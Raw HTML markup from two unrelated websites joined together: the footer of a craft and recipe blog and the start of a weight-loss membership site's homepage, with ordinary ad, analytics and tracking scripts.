src='https://secure.gravatar.com/avatar/5f683ef137b3b92df06a8f7d0d885ee0?s=46&#038;d=monsterid&#038;r=g' srcset='https://secure.gravatar.com/avatar/5f683ef137b3b92df06a8f7d0d885ee0?s=92&#038;d=monsterid&#038;r=g 2x' class='avatar avatar-46 photo' height=46 width=46></span></div><div class=rcg-text style=padding-left:56px>Jo commented on <a href=https://zoomyummy.com/2015/07/29/the-easiest-knitted-socks-ever-diy/#comment-1381712 title="Jo | The Easiest Knitted Socks Ever DIY">The Easiest Knitted Socks Ever DIY</a><br> (8 weeks ago)</div></div></li><li ><div class=rcg-wrapper><div class=rcg-avatar><span title=Queslina><img alt src='https://secure.gravatar.com/avatar/e40ac5f82d7e1a2bcb3042f342033cee?s=46&#038;d=monsterid&#038;r=g' srcset='https://secure.gravatar.com/avatar/e40ac5f82d7e1a2bcb3042f342033cee?s=92&#038;d=monsterid&#038;r=g 2x' class='avatar avatar-46 photo' height=46 width=46></span></div><div class=rcg-text style=padding-left:56px>Queslina commented on <a href=https://zoomyummy.com/2011/07/23/cinnamon-sugar-pull-apart-bread/#comment-1381546 title="Queslina | Cinnamon Sugar Pull-Apart Bread">Cinnamon Sugar Pull-Apart Bread</a><br> (10 weeks ago)</div></div></li><li ><div class=rcg-wrapper><div class=rcg-avatar><span title=Rachel><img alt src='https://secure.gravatar.com/avatar/2e2d4b7e085ca91978007136e2524352?s=46&#038;d=monsterid&#038;r=g' srcset='https://secure.gravatar.com/avatar/2e2d4b7e085ca91978007136e2524352?s=92&#038;d=monsterid&#038;r=g 2x' class='avatar avatar-46 photo' height=46 width=46></span></div><div class=rcg-text style=padding-left:56px>Rachel commented on <a href=https://zoomyummy.com/2013/02/25/awesome-peach-and-cinnamon-muffins/#comment-1381545 title="Rachel | Awesome Peach And Cinnamon Muffins">Awesome Peach And Cinnamon Muffins</a><br> (10 weeks ago)</div></div></li><li ><div class=rcg-wrapper><div class=rcg-avatar><span title=Rachel><img alt src='https://secure.gravatar.com/avatar/2e2d4b7e085ca91978007136e2524352?s=46&#038;d=monsterid&#038;r=g' srcset='https://secure.gravatar.com/avatar/2e2d4b7e085ca91978007136e2524352?s=92&#038;d=monsterid&#038;r=g 2x' class='avatar avatar-46 photo' height=46 width=46></span></div><div class=rcg-text style=padding-left:56px>Rachel commented on <a href=https://zoomyummy.com/2011/10/14/scalloped-hasselback-potatoes/#comment-1381544 title="Rachel | Scalloped Hasselback Potatoes">Scalloped Hasselback Potatoes</a><br> (10 weeks ago)</div></div></li></ul></div></aside></div></div></div></div><div class="site-footer grid-container grid-parent"><div id=footer-widgets class="site footer-widgets"><div class="inside-footer-widgets grid-container grid-parent"><div class="footer-widget-1 grid-parent grid-100 tablet-grid-50"><aside id=text-14 class="widget inner-padding widget_text"><div class=textwidget><div style="text-align:center; margin-top:1.5em;"> <strong>&copy; 2009-2019 zoomyummy.com</strong> | <a href=https://zoomyummy.com/blog/>Blog</a> - <a href=https://zoomyummy.com/about/>About</a> - <a href=https://zoomyummy.com/contact/>Contact</a> - <a href=https://zoomyummy.com/archives/>Blog Archives</a> - <a href=https://zoomyummy.com/crafty-ideas/>Crafty Ideas</a> - <a href=https://zoomyummy.com/photography/>Photography</a> - <a href=https://zoomyummy.com/recipes/>Recipes</a> - <a href=https://zoomyummy.com/sitemap/>Sitemap</a> - <a href=https://zoomyummy.com/business-terms/>Business Terms</a> - <a href=https://zoomyummy.com/shop/>My Shop</a><br><br>Crochet Patterns: <a href=https://zoomyummy.com/owl-crochet-pdf-patterns/>Owl</a> - <a href=https://zoomyummy.com/christmas-crochet-pdf-patterns/>Christmas</a> - <a href=https://zoomyummy.com/decorative-ornament-crochet-pdf-patterns/>Decorative Ornament</a> - <a href=https://zoomyummy.com/crocodile-stitch-crochet-pdf-patterns/>Crocodile Stitch</a> - <a href=https://zoomyummy.com/accessories-crochet-pdf-patterns/>Accessories</a> - <a href=https://zoomyummy.com/home-crochet-pdf-patterns/>Home</a> - <a href=https://zoomyummy.com/easter-crochet-pdf-patterns/>Easter</a> - <a href=https://zoomyummy.com/halloween-crochet-pdf-patterns/>Halloween</a> - <a href=https://zoomyummy.com/pin-cushion-crochet-pdf-patterns/>Pin Cushion</a> - <a href=https://zoomyummy.com/amigurumi-crochet-pdf-patterns/>Amigurumi</a> - <a href=https://zoomyummy.com/free-crochet-pdf-patterns/>Freebies</a></div><div style="text-align:center; margin-top:2.4em;"> <script async src=//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script> <ins class=adsbygoogle style=display:block data-ad-client=ca-pub-5571995028593943 data-ad-slot=5044592880 data-ad-format=auto></ins> <script>(adsbygoogle=window.adsbygoogle||[]).push({});</script> </div></div></aside></div></div></div> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');ga('create','UA-23915544-1','zoomyummy.com');ga('send','pageview');</script> <footer class=site-info itemtype=http://schema.org/WPFooter itemscope=itemscope><div class="inside-site-info grid-container grid-parent"> <span class=copyright>Copyright &copy; 2019</span> &#x000B7; <a href=https://generatepress.com target=_blank title=GeneratePress itemprop=url>GeneratePress</a></div></footer></div><div id=cookie-law-info-bar><span>This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish.<a data-cli_action=accept id=cookie_action_close_header class="medium cli-plugin-button cli-plugin-main-button cookie_action_close_header cli_action_button" style="display:inline-block; ">Accept</a> <a href=https://zoomyummy.com/business-terms/#cookies id=CONSTANT_OPEN_URL target=_blank class=cli-plugin-main-link style=display:inline-block; >Read More</a></span></div><div id=cookie-law-info-again style=display:none;><span id=cookie_hdr_showagain>Privacy & Cookies Policy</span></div><div class="cli-modal-backdrop cli-fade cli-settings-overlay"></div><div class="cli-modal-backdrop cli-fade cli-popupbar-overlay"></div> <script>cli_cookiebar_settings='{"animate_speed_hide":"500","animate_speed_show":"500","background":"#fff","border":"#444","border_on":false,"button_1_button_colour":"#000","button_1_button_hover":"#000000","button_1_link_colour":"#fff","button_1_as_button":true,"button_1_new_win":false,"button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":false,"button_2_hidebar":false,"button_3_button_colour":"#000","button_3_button_hover":"#000000","button_3_link_colour":"#fff","button_3_as_button":true,"button_3_new_win":false,"button_4_button_colour":"#000","button_4_button_hover":"#000000","button_4_link_colour":"#fff","button_4_as_button":true,"font_family":"inherit","header_fix":false,"notify_animate_hide":true,"notify_animate_show":false,"notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":false,"scroll_close_reload":false,"accept_close_reload":false,"reject_close_reload":false,"showagain_tab":false,"showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#000","show_once_yn":false,"show_once":"10000","logging_on":false,"as_popup":false,"popup_overlay":true,"bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"}';</script> <script>jQuery(document).ready(function($){$('#mobile-header .menu-toggle').GenerateMobileMenu();});</script> <script src=https://stats.wp.com/e-201920.js async=async defer=defer></script> <script>_stq=window._stq||[];_stq.push(['view',{v:'ext',j:'1:7.3',blog:'60654659',post:'0',tz:'1',srv:'zoomyummy.com'}]);_stq.push(['clickTrackerInit','60654659','0']);</script> <div class=essb_mailform><div class=essb_mailform_content><p>Send this to a friend</p><label class=essb_mailform_content_label>Your email</label><input type=text id=essb_mailform_from class=essb_mailform_content_input placeholder="Your email"><label class=essb_mailform_content_label>Recipient email</label><input type=text id=essb_mailform_to class=essb_mailform_content_input placeholder="Recipient email"><div class=essb_mailform_content_buttons><button id=essb_mailform_btn_submit class=essb_mailform_content_button onclick=essb_mailform_send();>Send</button><button id=essb_mailform_btn_cancel class=essb_mailform_content_button onclick="essb_close_mailform(); return false;">Cancel</button></div><input type=hidden id=essb_mail_salt value=1015503957><input type=hidden id=essb_mail_instance value><input type=hidden id=essb_mail_post value></div></div><div class=essb_mailform_shadow></div><link rel=stylesheet id=essb-cct-style href=https://zoomyummy.com/wp-content/plugins/easy-social-share-buttons3/lib/modules/click-to-tweet/assets/css/styles.css type=text/css media=all><link rel=stylesheet id=easy-social-share-buttons-subscribe href=https://zoomyummy.com/wp-content/plugins/easy-social-share-buttons3/assets/css/essb-subscribe.min.css type=text/css media=all><script>(function(){var po=document.createElement('script');po.type='text/javascript';po.async=true;;po.src='https://zoomyummy.com/wp-content/plugins/easy-social-share-buttons3/assets/js/essb-core.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po,s);})();</script><script>var essb_clicked_lovethis=false;var essb_love_you_message_thanks="Thank you for loving this.";var essb_love_you_message_loved="You already love this today.";var essb_mailform_opened=false;function essb_open_mailform(unique_id){jQuery.fn.extend({center:function(){return this.each(function(){var top=(jQuery(window).height()-jQuery(this).outerHeight())/2;var left=(jQuery(window).width()-jQuery(this).outerWidth())/2;jQuery(this).css({position:'fixed',margin:0,top:(top>0?top:0)+'px',left:(left>0?left:0)+'px'});});}});if(essb_mailform_opened){essb_close_mailform(unique_id);return;}var sender_element=jQuery(".essb_"+unique_id);if(!sender_element.length)return;var sender_post_id=jQuery(sender_element).attr("data-essb-postid")||"";jQuery("#essb_mail_instance").val(unique_id);jQuery("#essb_mail_post").val(sender_post_id);var win_width=jQuery(window).width();var win_height=jQuery(window).height();var doc_height=jQuery('document').height();var base_width=300;if(win_width<base_width){base_width=win_width-30;}var height_correction=20;var element_class=".essb_mailform";var element_class_shadow=".essb_mailform_shadow";jQuery(element_class).css({width:base_width+'px'});var popup_height=jQuery(element_class).outerHeight();if(popup_height>(win_height-30)){jQuery(element_class).css({height:(win_height-height_correction)+'px'});}jQuery("#essb_mailform_from").val("");jQuery("#essb_mailform_to").val("");if(jQuery("#essb_mailform_c").length)jQuery("#essb_mailform_c").val("");jQuery(element_class_shadow).css({height:(win_height)+'px'});jQuery(element_class).center();jQuery(element_class).slideDown(200);jQuery(element_class_shadow).fadeIn(200);essb_mailform_opened=true;essb.tracking_only("","mail",unique_id);};function essb_close_mailform(){var element_class=".essb_mailform";var element_class_shadow=".essb_mailform_shadow";jQuery(element_class).fadeOut(200);jQuery(element_class_shadow).fadeOut(200);essb_mailform_opened=false;};function essb_mailform_send(){var sender_email=jQuery("#essb_mailform_from").val();var recepient_email=jQuery("#essb_mailform_to").val();var captcha_validate=jQuery("#essb_mailform_c").length?true:false;var captcha=captcha_validate?jQuery("#essb_mailform_c").val():"";var custom_message=jQuery("#essb_mailform_custom").length?jQuery("#essb_mailform_custom").val():"";if(sender_email==""||recepient_email==""||(captcha==""&&captcha_validate)){alert("Please fill all fields in form");return;}var mail_salt=jQuery("#essb_mail_salt").val();var instance_post_id=jQuery("#essb_mail_post").val();console.log("mail salt = "+mail_salt);if(typeof(essb_settings)!="undefined"){jQuery.post(essb_settings.ajax_url,{"action":"essb_mail_action","post_id":instance_post_id,"from":sender_email,"to":recepient_email,"c":captcha,"cu":custom_message,"salt":mail_salt,"nonce":essb_settings.essb3_nonce},function(data){if(data){console.log(data);alert(data["message"]);if(data["code"]=="1")essb_close_mailform();}},'json');}};</script> </body></html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 141/180 objects using disk Page Caching using disk: enhanced Minified using disk Served from: zoomyummy.com @ 2019-05-16 17:23:56 by W3 Total Cache -->
0
<!DOCTYPE html><html class="html" lang="en-US" prefix="og: http://ogp.me/ns#" itemscope itemtype="http://schema.org/WebPage"><head><meta charset="UTF-8"><link rel="profile" href="http://gmpg.org/xfn/11"><link type="text/css" media="all" href="https://beingbadass.com/wp-content/cache/autoptimize/css/autoptimize_2f2b99eafbb70ac8ca5e9262d80ebe96.css" rel="stylesheet" /><title>BEING BADASS: Love Yourself, Lose Weight + Look Great In Photos</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="Join You Are A Babe: A Monthly Membership to Lose Weight, Love Yourself + Learn to Take Gorgeous Photos of Yourself with Just Your iPhone or Mobile Device!"/><link rel="canonical" href="https://beingbadass.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="BEING BADASS: Love Yourself, Lose Weight + Look Great In Photos" /><meta property="og:description" content="Join You Are A Babe: A Monthly Membership to Lose Weight, Love Yourself + Learn to Take Gorgeous Photos of Yourself with Just Your iPhone or Mobile Device!" /><meta property="og:url" content="https://beingbadass.com/" /><meta property="og:site_name" content="Being Badass by Betty Jean Bell" /><meta property="og:image" content="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/betty-jean-bell-you-are-a-babe-2.jpg?fit=1080%2C1350&#038;ssl=1" /><meta property="og:image:secure_url" content="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/betty-jean-bell-you-are-a-babe-2.jpg?fit=1080%2C1350&#038;ssl=1" /><meta property="og:image:width" content="1080" /><meta property="og:image:height" content="1350" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="Join You Are A Babe: A Monthly Membership to Lose Weight, Love Yourself + Learn to Take Gorgeous Photos of Yourself with Just Your iPhone or Mobile Device!" /><meta name="twitter:title" content="BEING BADASS: Love Yourself, Lose Weight + Look Great In Photos" /><meta name="twitter:image" content="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/betty-jean-bell-you-are-a-babe-2.jpg?fit=1080%2C1350&#038;ssl=1" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://beingbadass.com/#website","url":"https://beingbadass.com/","name":"Being Badass by Betty Jean Bell","potentialAction":{"@type":"SearchAction","target":"https://beingbadass.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <link rel='dns-prefetch' href='//s0.wp.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//ajax.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Being Badass by Betty Jean Bell &raquo; Feed" href="https://beingbadass.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Being Badass by Betty Jean Bell &raquo; Comments Feed" href="https://beingbadass.com/comments/feed/" /> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/beingbadass.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <link rel='stylesheet' id='wpurp_style2-css' href='https://fonts.googleapis.com/css?family=Open+Sans&#038;ver=3.9.0' type='text/css' media='all' /><link rel='stylesheet' id='wpurp_style4-css' href='//ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/themes/smoothness/jquery-ui.css?ver=3.9.0' type='text/css' media='all' /><link rel='stylesheet' id='oceanwp-google-font-roboto-css' href='//fonts.googleapis.com/css?family=Roboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%2C100i%2C200i%2C300i%2C400i%2C500i%2C600i%2C700i%2C800i%2C900i&#038;subset=latin&#038;ver=5.1.1' type='text/css' media='all' /><link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CLato%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://beingbadass.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <link rel='https://api.w.org/' href='https://beingbadass.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://beingbadass.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://beingbadass.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.1.1" /><link rel='shortlink' href='https://wp.me/P2iZ8V-1pm' /><link rel="alternate" type="application/json+oembed" href="https://beingbadass.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbeingbadass.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://beingbadass.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbeingbadass.com%2F&#038;format=xml" /> <script>(function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:1289148,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');</script> <script>!function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '524224251317777'); fbq('track', 'PageView');</script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=524224251317777&ev=PageView&noscript=1" /></noscript><link rel='dns-prefetch' href='//v0.wordpress.com'/><link rel='dns-prefetch' href='//i0.wp.com'/><link rel='dns-prefetch' href='//i1.wp.com'/><link rel='dns-prefetch' href='//i2.wp.com'/><meta name="p:domain_verify" content="b136984fb8da793ca75f4139dad3b902"/> <script src="https://f.convertkit.com/ckjs/ck.5.js"></script> <script src="https://player.vimeo.com/api/player.js"></script><link rel="icon" href="https://i0.wp.com/beingbadass.com/wp-content/uploads/2017/10/favicon.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /><link rel="icon" href="https://i0.wp.com/beingbadass.com/wp-content/uploads/2017/10/favicon.png?fit=60%2C60&#038;ssl=1" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://i0.wp.com/beingbadass.com/wp-content/uploads/2017/10/favicon.png?fit=60%2C60&#038;ssl=1" /><meta name="msapplication-TileImage" content="https://i0.wp.com/beingbadass.com/wp-content/uploads/2017/10/favicon.png?fit=60%2C60&#038;ssl=1" /> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-108355790-1', 'auto'); ga('send', 'pageview');</script> <link rel="stylesheet" type="text/css" id="wp-custom-css" href="https://beingbadass.com/?custom-css=623a41467a" /></head><body class="home page-template page-template-template-page-builder-no-sidebar page-template-template-page-builder-no-sidebar-php page page-id-5416 wp-custom-logo wp-embed-responsive no-isotope no-lightbox no-fitvids no-scroll-top no-sidr no-carousel no-matchheight fpt-template fpt-template-oceanwp oceanwp-theme sidebar-mobile default-breakpoint has-sidebar content-right-sidebar page-header-disabled has-breadcrumbs elementor-default elementor-page elementor-page-5416"><div id="outer-wrap" class="site clr"><div id="wrap" class="clr"><header id="site-header" class="minimal-header clr" data-height="74" itemscope="itemscope" itemtype="http://schema.org/WPHeader"><div id="site-header-inner" class="clr container"><div id="site-logo" class="clr" itemscope itemtype="http://schema.org/Brand"><div id="site-logo-inner" class="clr"> <a href="https://beingbadass.com/" class="custom-logo-link" rel="home" itemprop="url"><img width="602" height="222" src="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/12/being-badass-logo-1.jpg?fit=602%2C222&amp;ssl=1" class="custom-logo" alt="being-badass-logo" itemprop="logo" srcset="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/12/being-badass-logo-1.jpg?fit=602%2C222&amp;ssl=1 1x, https://beingbadass.com/wp-content/uploads/2018/12/being-badass-logo-1.jpg 2x" data-attachment-id="12625" data-permalink="https://beingbadass.com/being-badass-logo-3/" data-orig-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/12/being-badass-logo-1.jpg?fit=602%2C222&amp;ssl=1" data-orig-size="602,222" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="being-badass-logo" data-image-description="" data-medium-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/12/being-badass-logo-1.jpg?fit=300%2C111&amp;ssl=1" data-large-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/12/being-badass-logo-1.jpg?fit=602%2C222&amp;ssl=1" /></a></div></div><div id="site-navigation-wrap" class="clr"><nav id="site-navigation" class="navigation main-navigation clr" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement"><ul id="menu-main" class="main-menu dropdown-menu sf-menu"><li id="menu-item-6831" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children dropdown menu-item-6831"><a href="https://beingbadass.com/about-betty-jean-bell/" class="menu-link"><span class="text-wrap">ABOUT <span class="nav-arrow fa fa-angle-down"></span></span></a><ul class="sub-menu"><li id="menu-item-12034" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12034"><a href="https://beingbadass.com/speaking/" class="menu-link"><span class="text-wrap">SPEAKING</span></a></li><li id="menu-item-12036" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12036"><a href="https://beingbadass.com/contact/" class="menu-link"><span class="text-wrap">CONTACT</span></a></li></ul></li><li id="menu-item-14176" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-14176"><a class="menu-link"><span class="text-wrap">RESOURCES <span class="nav-arrow fa fa-angle-down"></span></span></a><ul class="sub-menu"><li id="menu-item-6720" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6720"><a href="https://beingbadass.com/shop/" class="menu-link"><span class="text-wrap">SHOP</span></a></li><li id="menu-item-4271" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4271"><a href="https://beingbadass.com/blog/" class="menu-link"><span class="text-wrap">BLOG</span></a></li></ul></li><li id="menu-item-14411" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14411"><a href="http://www.onlinemeetingnow.com/register/?id=mdv9ghuyx7" class="menu-link"><span class="text-wrap">START HERE</span></a></li><li id="menu-item-12764" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12764"><a href="https://beingbadass.com/results/" class="menu-link"><span class="text-wrap">RESULTS</span></a></li><li id="menu-item-5877" class="menu-cta menu-item menu-item-type-custom menu-item-object-custom menu-item-5877"><a href="https://beingbadass.com/you-are-a-babe/" class="menu-link"><span class="text-wrap">YOU ARE A BABE</span></a></li><li id="menu-item-12596" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12596"><a href="https://youare.beingbadass.com/login" class="menu-link"><span class="text-wrap">LOGIN</span></a></li><li class="search-toggle-li"><a href="#" class="site-search-toggle search-dropdown-toggle"><span class="icon-magnifier"></span></a></li></ul><div id="searchform-dropdown" class="header-searchform-wrap clr"><form method="get" class="searchform" id="searchform" action="https://beingbadass.com/"> <input type="text" class="field" name="s" id="s" placeholder="Search"></form></div></nav></div><div class="oceanwp-mobile-menu-icon clr mobile-right"> <a href="#" class="mobile-menu"> <i class="fa fa-bars"></i> <span class="oceanwp-text">Menu</span> </a></div></div></header><main id="main" class="site-main clr" ><div data-elementor-type="post" data-elementor-id="5416" class="elementor elementor-5416" data-elementor-settings="[]"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-element elementor-element-4a2f610f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="4a2f610f" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-background-overlay"></div><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-ac77e45 elementor-hidden-tablet elementor-hidden-phone elementor-column elementor-col-50 elementor-top-column" data-id="ac77e45" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-background-overlay"></div><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-e335f8a elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-image" data-id="e335f8a" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="582" height="600" src="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=582%2C600&amp;ssl=1" class="attachment-large size-large" alt="being-badass-you-are-a-babe-results-women" srcset="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?w=582&amp;ssl=1 582w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?resize=291%2C300&amp;ssl=1 291w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?resize=150%2C155&amp;ssl=1 150w" sizes="(max-width: 582px) 100vw, 582px" data-attachment-id="14839" data-permalink="https://beingbadass.com/home/being-badass-you-are-a-babe-results-women/" data-orig-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=582%2C600&amp;ssl=1" data-orig-size="582,600" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="being-badass-you-are-a-babe-results-women" data-image-description="" data-medium-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=291%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=582%2C600&amp;ssl=1" /></div></div></div></div></div></div><div class="elementor-element elementor-element-be73e3 elementor-column elementor-col-50 elementor-top-column" data-id="be73e3" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-59abc643 elementor-widget elementor-widget-image" data-id="59abc643" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="739" height="90" src="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?fit=739%2C90&amp;ssl=1" class="attachment-large size-large" alt="" 